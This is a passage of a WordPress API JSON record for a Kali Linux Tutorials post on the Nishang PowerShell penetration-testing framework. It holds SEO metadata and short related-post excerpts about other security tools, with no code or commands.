Security\",\"datePublished\":\"2020-05-29T15:35:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/\"},\"wordCount\":1325,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\",\"keywords\":[\"Nishang\",\"Penetration Testing\",\"PowerShell\",\"Red Team\",\"security\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/nishang\/\",\"name\":\"Nishang :Red Team, Penetration Testing & Offensive Security\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\",\"datePublished\":\"2020-05-29T15:35:12+00:00\",\"description\":\"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/nishang\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Nishang :Red Team, Penetration Testing & Offensive Security","description":"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/nishang\/","og_locale":"en_US","og_type":"article","og_title":"Nishang :Red Team, Penetration Testing & Offensive Security","og_description":"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing","og_url":"https:\/\/kalilinuxtutorials.com\/nishang\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2020-05-29T15:35:12+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/nishang\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/nishang\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Nishang : Offensive PowerShell For Red Team, Penetration Testing &#038; Offensive Security","datePublished":"2020-05-29T15:35:12+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/nishang\/"},"wordCount":1325,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","keywords":["Nishang","Penetration Testing","PowerShell","Red Team","security"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/nishang\/","url":"https:\/\/kalilinuxtutorials.com\/nishang\/","name":"Nishang :Red Team, Penetration Testing & Offensive Security","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","datePublished":"2020-05-29T15:35:12+00:00","description":"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/nishang\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/nishang\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":10717,"url":"https:\/\/kalilinuxtutorials.com\/qrljacking\/","url_meta":{"origin":10662,"position":0},"title":"QRLJacking : Hijack Services That Relies On QR Code Authentication","author":"R K","date":"June 10, 2020","format":false,"excerpt":"QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the Login with QR code feature as a secure way to login into accounts. In a nutshell, the victim scans the attacker\u2019s QR code which results\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":29734,"url":"https:\/\/kalilinuxtutorials.com\/ad-pentesting-toolkit\/","url_meta":{"origin":10662,"position":1},"title":"AD_Enumeration_Hunt &#8211; AD Pentesting Toolkit","author":"Varshini","date":"August 25, 2023","format":false,"excerpt":"Description Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRQNidCywBSvhZPPdBt_ukDVUl6ER4aTO2HlmYnohroCDuJot1JBs4oO_QOpWcj6Vmg2Lmv8-hrqmFV1Ir4-Pie_WnqJVbbntgApvMWd99B7GIRPbIF8KP5lqV06xy7wZ1s81Eye3VhoAoTy2B7DFxD3OOT0X5g-o-NT_Q-NueAQvmqhW9fLF4zGjI_w\/s16000\/AD_Enumeration_Hunt.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRQNidCywBSvhZPPdBt_ukDVUl6ER4aTO2HlmYnohroCDuJot1JBs4oO_QOpWcj6Vmg2Lmv8-hrqmFV1Ir4-Pie_WnqJVbbntgApvMWd99B7GIRPbIF8KP5lqV06xy7wZ1s81Eye3VhoAoTy2B7DFxD3OOT0X5g-o-NT_Q-NueAQvmqhW9fLF4zGjI_w\/s16000\/AD_Enumeration_Hunt.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRQNidCywBSvhZPPdBt_ukDVUl6ER4aTO2HlmYnohroCDuJot1JBs4oO_QOpWcj6Vmg2Lmv8-hrqmFV1Ir4-Pie_WnqJVbbntgApvMWd99B7GIRPbIF8KP5lqV06xy7wZ1s81Eye3VhoAoTy2B7DFxD3OOT0X5g-o-NT_Q-NueAQvmqhW9fLF4zGjI_w\/s16000\/AD_Enumeration_Hunt.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRQNidCywBSvhZPPdBt_ukDVUl6ER4aTO2HlmYnohroCDuJot1JBs4oO_QOpWcj6Vmg2Lmv8-hrqmFV1Ir4-Pie_WnqJVbbntgApvMWd99B7GIRPbIF8KP5lqV06xy7wZ1s81Eye3VhoAoTy2B7DFxD3OOT0X5g-o-NT_Q-NueAQvmqhW9fLF4zGjI_w\/s16000\/AD_Enumeration_Hunt.webp?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":4466,"url":"https:\/\/kalilinuxtutorials.com\/commandovm\/","url_meta":{"origin":10662,"position":2},"title":"CommandoVM : Windows-Based Security Distribution for Penetration Testing","author":"R K","date":"April 5, 2019","format":false,"excerpt":"Welcome to CommandoVM a fully customized, Windows-based security distribution for penetration testing and red teaming. Installation (Install Script) Requirements Windows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAM Instructions Create and configure a new Windows Virtual Machine Ensure VM is updated completely. You may have to\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1842,"url":"https:\/\/kalilinuxtutorials.com\/riskyspn-detect-abuse-risky-spns\/","url_meta":{"origin":10662,"position":3},"title":"RiskySPN &#8211; Collection of PowerShell Scripts Focused on Detecting and Abusing SPNs Accounts","author":"R K","date":"July 7, 2018","format":false,"excerpt":"RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory. Also Read\u00a0Metasploit Framework \u2013 A Beginner\u2019s\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":36881,"url":"https:\/\/kalilinuxtutorials.com\/fullbypass\/","url_meta":{"origin":10662,"position":4},"title":"FullBypass : A Tool For AMSI And PowerShell CLM Bypass","author":"Varshini","date":"March 6, 2025","format":false,"excerpt":"FullBypass is a tool designed to circumvent Microsoft's Antimalware Scan Interface (AMSI) and PowerShell's Constrained Language Mode (CLM). By doing so, it enables the execution of unrestricted PowerShell commands, providing a FullLanguage reverse shell. While such tools can be used for legitimate penetration testing and security research, their unethical use\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":33703,"url":"https:\/\/kalilinuxtutorials.com\/penetration-testing-tools\/","url_meta":{"origin":10662,"position":5},"title":"Penetration Testing Tools &#8211; For Educational And Ethical Use","author":"Varshini","date":"July 8, 2024","format":false,"excerpt":"This repository contains a collection of tools and resources for penetration testing and security research. This repository is intended solely for educational purposes and ethical penetration testing. By accessing, using, or contributing to this repository, you agree to the following terms: Educational Use Only: The tools and information provided in\u2026","rel":"","context":"In &quot;Pentesting Tools&quot;","block_context":{"text":"Pentesting Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/penetration-testing-tools\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiYucVz0EnmN3muSglVvHo-qGDv-EM8BfHNKry1-AeaJ3iJkV3iMweiVAfZjwDW1GBDKv16X9gSSk24bz0lcSlmUJ9WlV5FKdElfywNrE2a0mnf0HnprWi-WIUNpO77DoxtaDi8CzNwSSpGdNjHscp1ofjBQCipQaoTbhKQ4uCIpzCSyLfwTnRmLHoWq9Jc\/s16000\/Penetration%20Testing%20Tools.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiYucVz0EnmN3muSglVvHo-qGDv-EM8BfHNKry1-AeaJ3iJkV3iMweiVAfZjwDW1GBDKv16X9gSSk24bz0lcSlmUJ9WlV5FKdElfywNrE2a0mnf0HnprWi-WIUNpO77DoxtaDi8CzNwSSpGdNjHscp1ofjBQCipQaoTbhKQ4uCIpzCSyLfwTnRmLHoWq9Jc\/s16000\/Penetration%20Testing%20Tools.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiYucVz0EnmN3muSglVvHo-qGDv-EM8BfHNKry1-AeaJ3iJkV3iMweiVAfZjwDW1GBDKv16X9gSSk24bz0lcSlmUJ9WlV5FKdElfywNrE2a0mnf0HnprWi-WIUNpO77DoxtaDi8CzNwSSpGdNjHscp1ofjBQCipQaoTbhKQ4uCIpzCSyLfwTnRmLHoWq9Jc\/s16000\/Penetration%20Testing%20Tools.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiYucVz0EnmN3muSglVvHo-qGDv-EM8BfHNKry1-AeaJ3iJkV3iMweiVAfZjwDW1GBDKv16X9gSSk24bz0lcSlmUJ9WlV5FKdElfywNrE2a0mnf0HnprWi-WIUNpO77DoxtaDi8CzNwSSpGdNjHscp1ofjBQCipQaoTbhKQ4uCIpzCSyLfwTnRmLHoWq9Jc\/s16000\/Penetration%20Testing%20Tools.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiYucVz0EnmN3muSglVvHo-qGDv-EM8BfHNKry1-AeaJ3iJkV3iMweiVAfZjwDW1GBDKv16X9gSSk24bz0lcSlmUJ9WlV5FKdElfywNrE2a0mnf0HnprWi-WIUNpO77DoxtaDi8CzNwSSpGdNjHscp1ofjBQCipQaoTbhKQ4uCIpzCSyLfwTnRmLHoWq9Jc\/s16000\/Penetration%20Testing%20Tools.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiYucVz0EnmN3muSglVvHo-qGDv-EM8BfHNKry1-AeaJ3iJkV3iMweiVAfZjwDW1GBDKv16X9gSSk24bz0lcSlmUJ9WlV5FKdElfywNrE2a0mnf0HnprWi-WIUNpO77DoxtaDi8CzNwSSpGdNjHscp1ofjBQCipQaoTbhKQ4uCIpzCSyLfwTnRmLHoWq9Jc\/s16000\/Penetration%20Testing%20Tools.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/10662","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=10662"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/10662\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/16326"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=10662"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=10662"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=10662"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}